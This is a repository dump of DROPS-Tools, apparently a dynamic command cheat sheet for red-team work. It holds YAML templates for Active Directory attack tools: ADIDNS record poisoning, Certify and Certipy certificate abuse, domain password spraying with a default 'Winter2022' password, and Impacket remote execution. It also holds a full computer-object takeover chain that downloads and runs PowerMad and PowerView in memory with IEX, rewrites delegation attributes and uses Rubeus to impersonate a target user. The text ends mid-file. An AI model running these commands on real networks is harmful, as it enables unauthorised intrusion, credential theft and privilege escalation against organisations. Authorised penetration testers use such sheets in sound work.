├── .vscode └── param.code-snippets ├── LICENSE.md ├── README.md └── commands ├── ADIDNS.yaml ├── ADModule.yaml ├── Certify.yaml ├── Certipy.yaml ├── ComputerObjectTakeOver.yaml ├── Crackmapexec.yaml ├── DomainPasswordSpray.yaml ├── General.yaml ├── Impacket.yaml ├── Inveigh.yaml ├── KrbRelay.yaml ├── KrbRelayUp.yaml ├── MFASweep.yaml ├── Mimikatz.yaml ├── NMAP.yaml ├── NanoDump.yaml ├── NoPac.yaml ├── PPLDump.yaml ├── PPLKiller.yaml ├── PingCastle.yaml ├── PowerUpSQL.yaml ├── PowerView.yaml ├── PrinterBug.yaml ├── PrinterNightmareLPE.yaml ├── PrivExchange.yaml ├── PsExec.yaml ├── RDPHijack.yaml ├── Rubeus.yaml ├── SQL.yaml ├── SauronEye.yaml ├── Seatbelt.yaml ├── SessionGopher.yaml ├── SharPersist.yaml ├── SharpBlock.yaml ├── SharpChrome.yaml ├── SharpClipboard.yaml ├── SharpCloud.yaml ├── SharpCrashEventLog.yaml ├── SharpDPAPI.yaml ├── SharpEDRChecker.yaml ├── SharpFinder.yaml ├── SharpGPOAbuse.yaml ├── SharpHound.yaml ├── SharpMove.yaml ├── SharpRDP.yaml ├── SharpRDPHijack.yaml ├── SharpSCCM.yaml ├── SharpSQL.yaml ├── SharpShares.yaml ├── SharpSniper.yaml ├── SharpSpray.yaml ├── SharpStay.yaml ├── SharpUp.yaml ├── SharpWMI.yaml ├── Snaffler.yaml ├── SspiUacBypass.yaml ├── SweetPotato.yaml ├── WebFinder.yaml ├── WinPEAS.yaml ├── WindowsEnum.yaml ├── files.json ├── nltest.yaml ├── pretender.yaml └── reg.yaml /.vscode/param.code-snippets: -------------------------------------------------------------------------------- 1 | { 2 | // Place your AT_Methodologies workspace snippets here. Each snippet is defined under a snippet name and has a scope, prefix, body and 3 | // description. Add comma separated ids of the languages where the snippet is applicable in the scope field. If scope 4 | // is left empty or omitted, the snippet gets applied to all languages. The prefix is what is 5 | // used to trigger the snippet and the body will be expanded and inserted. Possible variables are: 6 | // $1, $2 for tab stops, $0 for the final cursor position, and ${1:label}, ${2:another} for placeholders. 7 | // Placeholders with the same ids are connected. 8 | // Example: 9 | // "Print to console": { 10 | // "scope": "javascript,typescript", 11 | // "prefix": "log", 12 | // "body": [ 13 | // "console.log('$1');", 14 | // "$2" 15 | // ], 16 | // "description": "Log output to console" 17 | // } 18 | "DROPS parameter label" : { 19 | "prefix": ["label"], 20 | "body": [ 21 | "- name: ${1:name}", 22 | "\ttype: label" 23 | ], 24 | "description": "Label definition" 25 | }, 26 | "DROPS parameter" : { 27 | "prefix": ["param"], 28 | "body": [ 29 | "- name: ${1:name}", 30 | "\ttype: text", 31 | "\tdescription: ${2:desc}", 32 | "\ttemplate: \"{0}\"", 33 | "\tdefault: ", 34 | "\toptional: false", 35 | ], 36 | "description": "A parameter definition" 37 | }, 38 | "DROPS parameter with options" : { 39 | "prefix": ["param"], 40 | "body": [ 41 | "- name: ${1:name}", 42 | "\tdescription: ", 43 | "\tdefault: ", 44 | "\ttemplate: \"{0}\"", 45 | "\ttype: select", 46 | "\toptions: []", 47 | "\toptional: false\n", 48 | ], 49 | "description": "A parameter definition" 50 | }, 51 | "DROPS flag" : { 52 | "prefix": ["flag"], 53 | "body": [ 54 | "- name: ${1:name}", 55 | "\ttype: flag", 56 | "\tdescription: ${2:desc}", 57 | "\tvalue: ", 58 | "\toptional: true", 59 | "\tselected: false", 60 | ], 61 | "description": "A parameter definition" 62 | }, 63 | "DROPS section" : { 64 | "prefix": ["section"], 65 | "body": [ 66 | "- name: ${1:name}", 67 | "\tlabels: []", 68 | "\tmitre: ''", 69 | "\tverb: ''", 70 | "\trequired_flags: []", 71 | "\toptional_flags: []", 72 | ], 73 | "description": "A section of command" 74 | }, 75 | "DROPS tool" : { 76 | "prefix": ["tool"], 77 | "body": [ 78 | "---", 79 | "projectLink:", 80 | "name:", 81 | "languages:", 82 | "\t- name: ", 83 | "\tprefix: \n", 84 | "params:\n", 85 | "sections:" 86 | ], 87 | "description": "A template for DROPS tool yaml" 88 | }, 89 | "Tools node": { 90 | "prefix": ["node"], 91 | "body": [ 92 | "{", 93 | "\t\"id\": \"${1:Name}\",", 94 | "\t\"label\": \"${1:Name}\",", 95 | "\t\"parentId\": \"\",", 96 | "\t\"items\": []", 97 | "}," 98 | ], 99 | "description": "Node definition for tools index json" 100 | }, 101 | "Tools leaf": { 102 | "prefix": ["leaf"], 103 | "body": [ 104 | "{", 105 | "\t\"id\" : \"commands/${1:Label}.yaml\",", 106 | "\t\"label\" : \"${1:Label}\",", 107 | "\t\"tags\" : []", 108 | "}," 109 | ], 110 | "description": "Leaf definition for tools index json" 111 | } 112 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DROPS-Tools 2 | Are you tired of creating and managing your own cheat sheets for the various tools you use in your day-to-day work? Do you find yourself copying, editing, and pasting commands to achieve the desired outcome? 3 | 4 | Introducing [DROPS](https://sygnialabs.github.io/DROPS), a dynamic cheat sheet for CLI tools that saves you time by generating the commands for you, without the need to modify templates from static cheat sheets. With DROPS, you no longer need to remember all the parameters and flags for each individual tool you use, and it even allows you to share the same parameter values across different tools. 5 | 6 | ## About the repository 7 | This repository contains cheat sheet files for each tool reflected in [DROPS](https://sygnialabs.github.io/DROPS), which enables you to add more tools or edit existing ones in this cheat sheet. If you're interested in contributing, please refer to our [Wiki](https://github.com/SygniaLabs/DROPS-Tools/wiki) for a guide on how to do so. -------------------------------------------------------------------------------- /commands/ADIDNS.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/Kevin-Robertson/Powermad 3 | name: ADIDNS 4 | params: 5 | - name: DNSName 6 | description: Name of new recored that will be created 7 | default: '*' 8 | - name: DNSData 9 | description: Attackers IP 10 | - name: DNSType 11 | description: Type of recored that will be created 12 | default: A 13 | 14 | 15 | sections: 16 | - name: Create new DNS recored (wildcard available) 17 | labels: ["Lateral", "Relaying"] 18 | commands: 19 | - language: PS 20 | command: New-ADIDNSNode -Node {{DNSName}} -Data {{DNSData}} 21 | 22 | - name: Remove existing DNS recored (tombstone before removeing) 23 | labels: ["Lateral", "Relaying"] 24 | commands: 25 | - language: PS 26 | command: Remove-ADIDNSNode -Node {{DNSName}} 27 | 28 | - name: Create a tombstoned recored 29 | labels: ["Lateral", "Relaying"] 30 | commands: 31 | - language: PS 32 | command: New-ADIDNSNode -Node {{DNSName}} -Tombstone 33 | 34 | - name: Enable a tombstoned DNS record 35 | labels: ["Lateral", "Relaying"] 36 | commands: 37 | - language: PS 38 | command: Enable-ADIDNSNode -Node {{DNSName}} 39 | 40 | - name: tombstone a DNS record 41 | labels: ["Lateral", "Relaying"] 42 | commands: 43 | - language: PS 44 | command: Disable-ADIDNSNode -Node {{DNSName}} 45 | 46 | - name: Change DNS recored data 47 | labels: ["Lateral", "Relaying"] 48 | commands: 49 | - language: PS 50 | command: Invoke-DNSUpdate -DNSType {{DNSType}} -DNSName {{DNSName}} -DNSData {{DNSData}} 51 | 52 | - name: Get the owenr of a node 53 | labels: ["Recon"] 54 | commands: 55 | - language: PS 56 | command: Get-ADIDNSNodeOwner -Node {{DNSName}} 57 | 58 | - name: Get the DACL for a DNS node 59 | labels: ["Recon"] 60 | commands: 61 | - language: PS 62 | command: Get-ADIDNSPermission -Node {{DNSName}} 63 | 64 | -------------------------------------------------------------------------------- /commands/ADModule.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps 3 | name: AD Module 4 | 5 | params: 6 | - name: Domain 7 | description: Name of the domain to enumerate. 8 | default: example.local 9 | - name: Forest 10 | description: Name of the forest to enumerate. 11 | default: example.local 12 | 13 | sections: 14 | - name: name 15 | labels: ["Recon"] 16 | mitre: "" 17 | commands: 18 | - language: PS 19 | command: Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName 20 | 21 | - name: Domain trusts for the current domain 22 | labels: ["Recon"] 23 | mitre: "" 24 | commands: 25 | - language: PS 26 | command: |- 27 | Get-ADTrust 28 | Get-ADTrust –Identity {{Domain}} 29 | 30 | - name: Details about the current forest 31 | labels: ["Recon"] 32 | mitre: '' 33 | commands: 34 | - language: PS 35 | command: |- 36 | Get-ADForest 37 | Get-ADForest –Identity {{Domain}} 38 | 39 | -------------------------------------------------------------------------------- /commands/Certify.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/GhostPack/Certify 3 | name: Certify 4 | languages: 5 | - name: EXE 6 | prefix: Certify.exe 7 | - name: Apollo 8 | prefix: inline_assembly -Assembly "Certify" -Arguments " 9 | params: 10 | - name: ca 11 | description: '' 12 | template: "/ca:{0}" 13 | optional: true 14 | selected: false 15 | type: text 16 | default: '' 17 | 18 | - name: domain 19 | description: '' 20 | template: "/domain:{0}" 21 | optional: true 22 | selected: false 23 | type: text 24 | default: '' 25 | 26 | - name: path 27 | description: '' 28 | template: "/path:{0}" 29 | optional: true 30 | selected: false 31 | type: text 32 | default: '' 33 | 34 | - name: outfile 35 | description: '' 36 | template: "/outfile:{0}" 37 | optional: true 38 | selected: false 39 | type: text 40 | default: '' 41 | 42 | - name: subject 43 | description: '' 44 | template: "/subject:{0}" 45 | optional: true 46 | selected: false 47 | type: text 48 | default: '' 49 | 50 | - name: template 51 | description: '' 52 | template: "/template:{0}" 53 | optional: true 54 | selected: false 55 | type: text 56 | default: '' 57 | 58 | - name: altname 59 | description: '' 60 | template: "/altname:{0}" 61 | optional: true 62 | selected: false 63 | type: text 64 | default: '' 65 | 66 | - name: onbehalfof 67 | description: '' 68 | template: "/onbehalfof:{0}" 69 | optional: true 70 | selected: false 71 | type: text 72 | default: '' 73 | 74 | - name: enrollcert 75 | description: '' 76 | template: "/enrollcert:{0}" 77 | optional: true 78 | selected: false 79 | type: text 80 | default: '' 81 | 82 | - name: enrollcertpw 83 | description: '' 84 | template: "/enrollcertpw:{0}" 85 | optional: true 86 | selected: false 87 | type: text 88 | default: '' 89 | 90 | - name: id 91 | description: '' 92 | template: "/id:{0}" 93 | optional: true 94 | selected: false 95 | type: text 96 | default: '' 97 | 98 | - name: hideAdmins 99 | description: '' 100 | optional: true 101 | selected: false 102 | type: flag 103 | value: '/hideAdmins' 104 | 105 | - name: showAllPermissions 106 | description: '' 107 | optional: true 108 | selected: false 109 | type: flag 110 | value: '/showAllPermissions' 111 | 112 | - name: skipWebServiceChecks 113 | description: '' 114 | optional: true 115 | selected: false 116 | type: flag 117 | value: '/skipWebServiceChecks' 118 | 119 | - name: quiet 120 | description: '' 121 | optional: true 122 | selected: false 123 | type: flag 124 | value: '/quiet' 125 | 126 | - name: vulnerable 127 | description: '' 128 | optional: true 129 | selected: false 130 | type: flag 131 | value: '/vulnerable' 132 | 133 | - name: currentuser 134 | description: '' 135 | optional: true 136 | selected: false 137 | type: flag 138 | value: '/currentuser' 139 | 140 | - name: enrolleeSuppliesSubject 141 | description: '' 142 | optional: true 143 | selected: false 144 | type: flag 145 | value: '/enrolleeSuppliesSubject' 146 | 147 | - name: clientauth 148 | description: '' 149 | optional: true 150 | selected: false 151 | type: flag 152 | value: '/clientauth' 153 | 154 | - name: json 155 | description: '' 156 | optional: true 157 | selected: false 158 | type: flag 159 | value: '/json' 160 | 161 | - name: showAdmins 162 | description: '' 163 | optional: true 164 | selected: false 165 | type: flag 166 | value: '/showAdmins' 167 | 168 | - name: install 169 | description: '' 170 | optional: true 171 | selected: false 172 | type: flag 173 | value: '/install' 174 | 175 | - name: machine 176 | description: '' 177 | optional: true 178 | selected: false 179 | type: flag 180 | value: '/machine' 181 | 182 | 183 | sections: 184 | 185 | - name: Find information about all registered CAs 186 | labels: [] 187 | mitre: "" 188 | verb: 'cas' 189 | required_flags: [] 190 | optional_flags: ["domain", "ca", "hideAdmins", "showAllPermissions", "skipWebServiceChecks", "quiet"] 191 | 192 | 193 | 194 | - name: Find all enabled certificate templates 195 | labels: [] 196 | mitre: "" 197 | verb: 'find' 198 | required_flags: [] 199 | optional_flags: ["domain", "ca", "quiet"] 200 | 201 | 202 | - name: Find vulnerable/abusable certificate templates using default low-privileged groups 203 | labels: [] 204 | mitre: "" 205 | verb: 'find' 206 | required_flags: ["vulnerable"] 207 | optional_flags: ["domain", "ca", "quiet"] 208 | 209 | 210 | - name: Find vulnerable/abusable certificate templates using all groups the current user context is a part of 211 | labels: [] 212 | mitre: "" 213 | verb: 'find' 214 | required_flags: ["vulnerable", "currentuser"] 215 | optional_flags: ["domain", "quiet"] 216 | 217 | 218 | - name: Find enabled certificate templates where ENROLLEE_SUPPLIES_SUBJECT is enabled 219 | labels: [] 220 | mitre: "" 221 | verb: 'find' 222 | required_flags: ["enrolleeSuppliesSubject"] 223 | optional_flags: ["domain", "quiet"] 224 | 225 | 226 | - name: Find enabled certificate templates capable of client authentication 227 | labels: [] 228 | mitre: "" 229 | verb: 'find' 230 | required_flags: ["clientauth"] 231 | optional_flags: ["domain", "quiet"] 232 | 233 | 234 | - name: Find all enabled certificate templates, display all of their permissions, and don't display the banner message 235 | labels: [] 236 | mitre: "" 237 | verb: 'find' 238 | required_flags: ["showAllPermissions", "quiet"] 239 | optional_flags: ["domain"] 240 | 241 | 242 | - name: Find all enabled certificate templates and output to a json file 243 | labels: [] 244 | mitre: "" 245 | verb: 'find' 246 | required_flags: ["json", "outfile"] 247 | optional_flags: ["domain"] 248 | 249 | 250 | 251 | - name: Enumerate access control information for PKI objects 252 | labels: [] 253 | mitre: "" 254 | verb: 'pkiobjects' 255 | required_flags: [] 256 | optional_flags: ["domain", "showAdmins", "quiet"] 257 | 258 | 259 | 260 | - name: Request a new certificate using the current user context 261 | labels: [] 262 | mitre: "" 263 | verb: 'request' 264 | required_flags: ["ca"] 265 | optional_flags: ["subject", "template", "install"] 266 | 267 | 268 | - name: Request a new certificate using the current machine context 269 | labels: [] 270 | mitre: "" 271 | verb: 'request' 272 | required_flags: ["ca", "machine"] 273 | optional_flags: ["subject", "template", "install"] 274 | 275 | 276 | - name: Request a new certificate using the current user context but for an alternate name (if supported) 277 | labels: [] 278 | mitre: "" 279 | verb: 'request' 280 | required_flags: ["ca", "template"] 281 | optional_flags: ["altname"] 282 | 283 | 284 | - name: Request a new certificate on behalf of another user, using an enrollment agent certificate 285 | labels: [] 286 | mitre: "" 287 | verb: 'request' 288 | required_flags: ["ca","template", "onbehalfof", "enrollcert"] 289 | optional_flags: ["enrollcertpw"] 290 | 291 | 292 | 293 | - name: Download an already requested certificate 294 | labels: [] 295 | mitre: "" 296 | verb: 'download' 297 | required_flags: ["ca", "id"] 298 | optional_flags: ["install", "machine"] 299 | 300 | -------------------------------------------------------------------------------- /commands/Certipy.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/ly4k/Certipy 3 | name: Certipy 4 | languages: 5 | - name: Python 6 | prefix: certipy 7 | 8 | params: 9 | - name: target 10 | description: '[[domain/]username[:password]@]' 11 | template: "{domain}/{username}:{password}@{0}" 12 | optional: false 13 | type: text 14 | default: dc.domain.local 15 | 16 | #authentication options: 17 | - name: Authentication Options 18 | type: label 19 | 20 | - name: hashes 21 | type: text 22 | description: NTLM hashes, format is LMHASH:NTHASH 23 | template: "-hashes {0}" 24 | default: 25 | optional: false 26 | 27 | - name: no-pass 28 | type: flag 29 | description: Don't ask for password (useful for -k) 30 | value: "-no-pass" 31 | optional: true 32 | selected: false 33 | 34 | - name: kerberos 35 | type: flag 36 | description: Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. 37 | value: '-k' 38 | optional: true 39 | selected: false 40 | 41 | 42 | #find options: 43 | - name: Find 44 | type: label 45 | 46 | - name: enabled 47 | type: flag 48 | description: Show only enabled certificate templates 49 | value: "-enabled" 50 | optional: true 51 | selected: true 52 | 53 | #output options: 54 | - name: Output Options 55 | type: label 56 | 57 | - name: debug 58 | type: flag 59 | description: Turn DEBUG output ON 60 | value: '-debug' 61 | optional: true 62 | selected: false 63 | 64 | - name: outputPrefix 65 | type: text 66 | description: Filename prefix for writing results to 67 | template: "-output {0}" 68 | default: "cert-prefix-out" 69 | optional: false 70 | 71 | - name: output 72 | type: text 73 | description: output file name 74 | template: "-out {0}" 75 | default: "out.txt" 76 | optional: false 77 | 78 | - name: json 79 | type: flag 80 | description: Output result as JSON only 81 | value: "-json" 82 | optional: true 83 | selected: false 84 | 85 | - name: bloodhound 86 | type: flag 87 | description: Output result as BloodHound data only 88 | value: "-bloodhound" 89 | optional: true 90 | selected: false 91 | 92 | - name: text 93 | type: flag 94 | description: Output result as text only 95 | value: "-text" 96 | optional: true 97 | selected: false 98 | 99 | 100 | 101 | 102 | #connection options: 103 | - name: Connection Options 104 | type: label 105 | 106 | - name: scheme 107 | type: text 108 | description: LDAP Scheme to query 109 | template: "{0}" 110 | default: "OU=...," 111 | optional: false 112 | 113 | - name: target-ip 114 | type: text 115 | description: IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it 116 | template: "-target-ip {0}" 117 | default: "192.168.1.1" 118 | optional: true 119 | 120 | - name: ns 121 | type: text 122 | description: Nameserver for DNS resolution 123 | template: "-ns {0}" 124 | default: "ns1.domain.local" 125 | optional: true 126 | 127 | - name: timeout 128 | type: text 129 | description: Timeout for connections in seconds 130 | template: "-timeout {0}" 131 | default: "5" 132 | optional: true 133 | 134 | - name: dc-ip 135 | type: text 136 | description: IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target. 137 | template: "-dc-ip {0}" 138 | default: "" 139 | optional: true 140 | selected: false 141 | 142 | - name: dns-tcp 143 | type: flag 144 | description: Use TCP instead of UDP for DNS queries 145 | value: "-dns-tcp" 146 | optional: true 147 | selected: false 148 | 149 | 150 | 151 | 152 | sections: 153 | - name: Enumerating enabled AD CS certificate templates 154 | labels: [] 155 | mitre: '' 156 | verb: 'find' 157 | required_flags: ["target"] 158 | optional_flags: ["debug", "json", "bloodhound", "text", "outputPrefix", "enabled", "scheme", "dc-ip", "target-ip", "ns", "dns-tcp", "timeout", "hashes", "no-pass", "kerberos"] 159 | -------------------------------------------------------------------------------- /commands/ComputerObjectTakeOver.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | params: 3 | - name: Domain 4 | description: FQDN for the domain 5 | - name: Target Computer 6 | description: Hotname of the target copmuter 7 | - name: Target User 8 | description: Userame for the impersonated account (probably DA) 9 | - name: Fake Computer 10 | description: Hostname for the new fake computer 11 | - name: Fake Copmuter Password 12 | description: Computer password for the new fake computer 13 | - name: PowerMad 14 | description: "Dependency: URI to download PowerMad" 15 | default: https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1 16 | - name: PowerView 17 | description: "Dependency: URI to download PowerView" 18 | default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 19 | - name: Rubeus 20 | description: "Dependency: URI to download Rubeus" 21 | default: "" 22 | - name: RC4 23 | description: RC4_HMAC result of the fake computer password 24 | sections: 25 | - name: Info 26 | labels: [] 27 | mitre: "" 28 | commands: 29 | - language: Prerequisites 30 | command: |- 31 | 1 - Write privileges over the target computer object 32 | .2 - Permissions to add computer 33 | 3 - At least Windows 2012 DC 34 | - language: Additional 35 | command: |- 36 | 1 - For some reason SMB (after ticket injection) requires session to be elevated 37 | 2 - Powershell remoting does work in low privileged mode 38 | - name: Load dependacies 39 | labels: [] 40 | mitre: "" 41 | commands: 42 | - language: PS 43 | command: |- 44 | IEX (New-Object Net.WebClient).DownloadString('{{PowerMad}}'); 45 | IEX (New-Object Net.WebClient).DownloadString('{{PowerView}}'); 46 | $rubeusb64 = IEX (New-Object Net.WebClient).DownloadString('{{PowerMad}}'); 47 | $RubeusAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($rubeusb64)) 48 | - name: Add fake computer 49 | labels: [] 50 | mitre: "" 51 | commands: 52 | - language: PS 53 | command: 54 | New-MachineAccount -MachineAccount {{Fake Computer}} -Password $(ConvertTo-SecureString 55 | '{{Fake Copmuter Password}}' -AsPlainText -Force) -Verbose 56 | - name: Modifying Target Computer's AD Object and get RC4 57 | labels: [] 58 | mitre: "" 59 | commands: 60 | - language: PS 61 | command: |- 62 | $fakesid = Get-DomainComputer {{Fake Computer}} | Select objectsid | Out-String 63 | $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$fakesid)" 64 | $SDBytes = New-Object byte[] ($SD.BinaryLength) 65 | $SD.GetBinaryForm($SDBytes, 0) 66 | Get-DomainComputer {{Target Computer}} | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose 67 | [Rubeus.Program]::Main("hash /password:{{Fake Copmuter Password}} /user:{{Fake Computer}} /domain:{{Domain}}".Split()) 68 | - name: Execution 69 | labels: [] 70 | mitre: "" 71 | commands: 72 | - language: PS 73 | command: 74 | '[Rubeus.Program]::Main("s4u /user:{{Fake Computer}}$ /rc4:{{RC4}} /impersonateuser:{{Target 75 | User}} /msdsspn:CIFS/{{Target Computer}} /altservice:cifs,host,http /ptt".Split())' 76 | -------------------------------------------------------------------------------- /commands/DomainPasswordSpray.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/dafthack/DomainPasswordSpray 3 | name: DomainPasswordSpray 4 | languages: 5 | - name: PS 6 | prefix: '' 7 | 8 | params: 9 | 10 | - name: Target 11 | type: label 12 | 13 | - name: Domain 14 | type: text 15 | description: The domain to spray against 16 | template: "-Domain {0}" 17 | default: '' 18 | optional: false 19 | 20 | - name: UserList 21 | type: text 22 | description: Optional UserList parameter. This will be generated automatically if not specified 23 | template: "-UserList {0}" 24 | default: 'userlist.txt' 25 | optional: true 26 | selected: false 27 | 28 | - name: Filter 29 | type: text 30 | description: Custom LDAP filter for users list fetch 31 | template: "-Filter {0}" 32 | default: '(description=*admin*)' 33 | optional: true 34 | selected: false 35 | 36 | - name: Passwords 37 | type: label 38 | 39 | - name: Password 40 | type: text 41 | description: A single password that will be used to perform the password spray 42 | template: "-Password {0}" 43 | default: 'Winter2022' 44 | optional: true 45 | selected: true 46 | 47 | - name: PasswordList 48 | type: text 49 | description: A list of passwords one per line to use for the password spray (Be very careful not to lockout accounts). 50 | template: "-PasswordList {0}" 51 | default: 'passwords.txt' 52 | optional: true 53 | selected: false 54 | 55 | - name: Throttling 56 | type: label 57 | 58 | - name: Fudge 59 | type: text 60 | description: Extra wait time between each round of tests (seconds) 61 | template: "-Fudge {0}" 62 | default: '60' 63 | optional: true 64 | selectd: false 65 | 66 | - name: Output 67 | type: label 68 | 69 | - name: OutFile 70 | type: text 71 | description: A file to output the results to 72 | template: "-OutFile {0}" 73 | default: 'sprayed-out.txt' 74 | optional: true 75 | selected: false 76 | 77 | - name: Flags 78 | type: label 79 | 80 | - name: UsernameAsPassword 81 | type: flag 82 | description: For each user, will try that user's name as their password 83 | value: '-UsernameAsPassword' 84 | optional: true 85 | selected: false 86 | 87 | - name: Force 88 | type: flag 89 | description: Forces the spray to continue and doesn't prompt for confirmation 90 | value: '-Force' 91 | optional: true 92 | selected: false 93 | 94 | - name: RemoveDisabled 95 | type: flag 96 | description: Attempts to remove disabled accounts from the userlist 97 | value: '-RemoveDisabled' 98 | optional: true 99 | selected: false 100 | 101 | - name: RemovePotentialLockouts 102 | type: flag 103 | description: Removes accounts within 1 attempt of locking out 104 | value: '-RemovePotentialLockouts' 105 | optional: true 106 | selected: false 107 | 108 | - name: Quiet 109 | type: flag 110 | description: Less output to work better over C2 111 | value: '-Quiet' 112 | optional: true 113 | selected: false 114 | 115 | sections: 116 | 117 | - name: Gather a userlist from the domain, optionally excluding disabled accounts and accounts that are about to be lockd out 118 | labels: ['Recon'] 119 | mitre: 'T1078.002' 120 | verb: 'Get-DomainUserList' 121 | required_flags: [Domain] 122 | optional_flags: [RemoveDisabled, RemovePotentialLockouts, Filter] 123 | 124 | - name: Generate a list of users from the current user's domain and attempt to authenticate using each username and a specified password 125 | labels: ['Credential Access'] 126 | mitre: 'T1110.003' 127 | verb: 'Invoke-DomainPasswordSpray' 128 | required_flags: [Password] 129 | optional_flags: [PasswordList, Filter, Domain, OutFile, Quiet, Fudge, Force, UsernameAsPassword] 130 | 131 | - name: Iterate over a users list and attempt to authenticate using passwords from a file, one at a time. It will automatically attempt to detect the domain's lockout window and restrict sprays attempts during each window. 132 | labels: ['Credential Access'] 133 | mitre: 'T1110.003' 134 | verb: 'Invoke-DomainPasswordSpray' 135 | required_flags: [UserList, Domain, PasswordList] 136 | optional_flags: [Filter, OutFile, Quiet, Fudge, Force, UsernameAsPassword] -------------------------------------------------------------------------------- /commands/General.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://lolbas-project.github.io/ 3 | name: LOLBAS 4 | params: 5 | - name: Username 6 | description: Username 7 | default: 8 | - name: GroupName 9 | description: Username 10 | default: 11 | 12 | sections: 13 | - name: Systeminfo 14 | labels: ["Recon", "Local"] 15 | mitre: "T1082" 16 | commands: 17 | - language: Batch 18 | command: |- 19 | systeminfo 20 | hostname 21 | 22 | - name: Hotfixes 23 | labels: ["Recon", "Local"] 24 | mitre: "T1082" 25 | commands: 26 | - language: Batch 27 | command: wmic qfe get Caption,Description,HotFixID,InstalledOn 28 | 29 | - name: Network information 30 | labels: ["Recon", "Local"] 31 | mitre: "" 32 | commands: 33 | - language: Batch 34 | command: |- 35 | ipconfig /all 36 | route print 37 | arp -A 38 | 39 | - name: Local users and groups enumeration 40 | labels: ["Recon", "Local"] 41 | mitre: "" 42 | commands: 43 | - language: Batch 44 | command: |- 45 | net users 46 | net localgroups 47 | net localgroup {{GroupName}} 48 | net user {{Username}} 49 | 50 | - name: Domain users and group enumeration 51 | labels: ["Recon", "LDAP"] 52 | mitre: "" 53 | commands: 54 | - language: Batch 55 | command: |- 56 | net user {{Username}} /domain 57 | net group {{GroupName}} /domain 58 | -------------------------------------------------------------------------------- /commands/Impacket.yaml: -------------------------------------------------------------------------------- 1 | projectLink: https://github.com/SecureAuthCorp/impacket 2 | name: Impacket 3 | languages: 4 | - name: Python 5 | prefix: '' 6 | params: 7 | - name: domain 8 | description: 'Domain to authenticate to' 9 | template: "{0}" 10 | optional: false 11 | selected: false 12 | type: text 13 | default: domain 14 | 15 | - name: username 16 | description: 'User to authneticate with' 17 | template: "{0}" 18 | optional: false 19 | selected: false 20 | type: text 21 | default: bob 22 | 23 | - name: password 24 | description: 'Password to authenticate with' 25 | template: "{0}" 26 | optional: false 27 | selected: false 28 | type: text 29 | default: 30 | 31 | - name: target 32 | description: '[[domain/]username[:password]@]' 33 | template: "{domain}/{username}:{password}@{0}" 34 | optional: false 35 | selected: false 36 | type: text 37 | default: dc.domain.local 38 | 39 | - name: command 40 | description: 'command to execute at the target. If empty it will launch a semi-interactive shell' 41 | template: "{0}" 42 | optional: true 43 | selected: false 44 | type: text 45 | default: 'whoami' 46 | 47 | - name: share 48 | description: 'Share where the output will be grabbed from (default ADMIN$)' 49 | template: "-share {0}" 50 | optional: true 51 | selected: false 52 | type: text 53 | default: 'ADMIN$' 54 | 55 | 56 | - name: codec 57 | type: text 58 | description: Sets encoding used (codec) from the target's output (default "utf-8") 59 | template: '-codec {0}' 60 | default: "utf-8" 61 | optional: true 62 | selected: false 63 | 64 | 65 | - name: shell-type 66 | type: select 67 | description: choose a command processor for the semi-interactive shell 68 | template: '-shell-type {0}' 69 | options: ['cmd', 'powershell'] 70 | optional: true 71 | 72 | - name: com-version 73 | type: text 74 | description: DCOM version, format is MAJOR_VERSION:MINOR_VERSION e.g. 5.7 75 | template: '-com-version {0}' 76 | default: '' 77 | optional: true 78 | 79 | 80 | - name: hashes 81 | type: text 82 | description: NTLM hashes, format is LMHASH:NTHASH 83 | template: "-hashes {0}" 84 | default: 85 | optional: false 86 | 87 | 88 | - name: aesKey 89 | type: text 90 | description: AES key to use for Kerberos Authentication (128 or 256 bits) 91 | template: "-aesKey {0}" 92 | default: "" 93 | optional: true 94 | 95 | - name: dc-ip 96 | type: text 97 | description: IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target. 98 | template: "-dc-ip {0}" 99 | default: "" 100 | optional: true 101 | selected: false 102 | 103 | - name: auth-file 104 | type: text 105 | description: Smbclient/mount.cifs-style authentication file 106 | template: "-A {0}" 107 | default: 108 | optional: true 109 | selected: false 110 | 111 | - name: keytab 112 | type: text 113 | description: Read keys for SPN from keytab file 114 | template: "-keytab {0}" 115 | default: "" 116 | optional: true 117 | selected: false 118 | 119 | - name: port 120 | type: text 121 | description: Destination port to connect to SMB Server 122 | template: "-port {0}" 123 | default: "445" 124 | optional: true 125 | selected: false 126 | 127 | 128 | - name: identity 129 | description: '[domain/]username[:password]' 130 | template: "{domain}/{username}:{password}" 131 | optional: false 132 | type: text 133 | default: {username} 134 | 135 | - name: user 136 | type: text 137 | description: Filter output by this user 138 | template: "-user {0}" 139 | default: "filteruser" 140 | optional: true 141 | selected: false 142 | 143 | 144 | - name: users 145 | type: text 146 | description: Input file with list of users to filter to output for 147 | template: "-users {0}" 148 | default: 'users.txt' 149 | optional: true 150 | selected: false 151 | 152 | - name: targets 153 | type: text 154 | description: Input file with targets system to query info from (one per line). If not specified script will run in domain mode. 155 | template: "-targets {0}" 156 | default: 'targets.txt' 157 | optional: true 158 | selected: false 159 | 160 | 161 | 162 | - name: delay 163 | type: text 164 | description: Seconds delay between starting each batch probe (default 10 seconds) 165 | template: "-delay {0}" 166 | default: "10" 167 | optional: true 168 | selected: false 169 | 170 | - name: 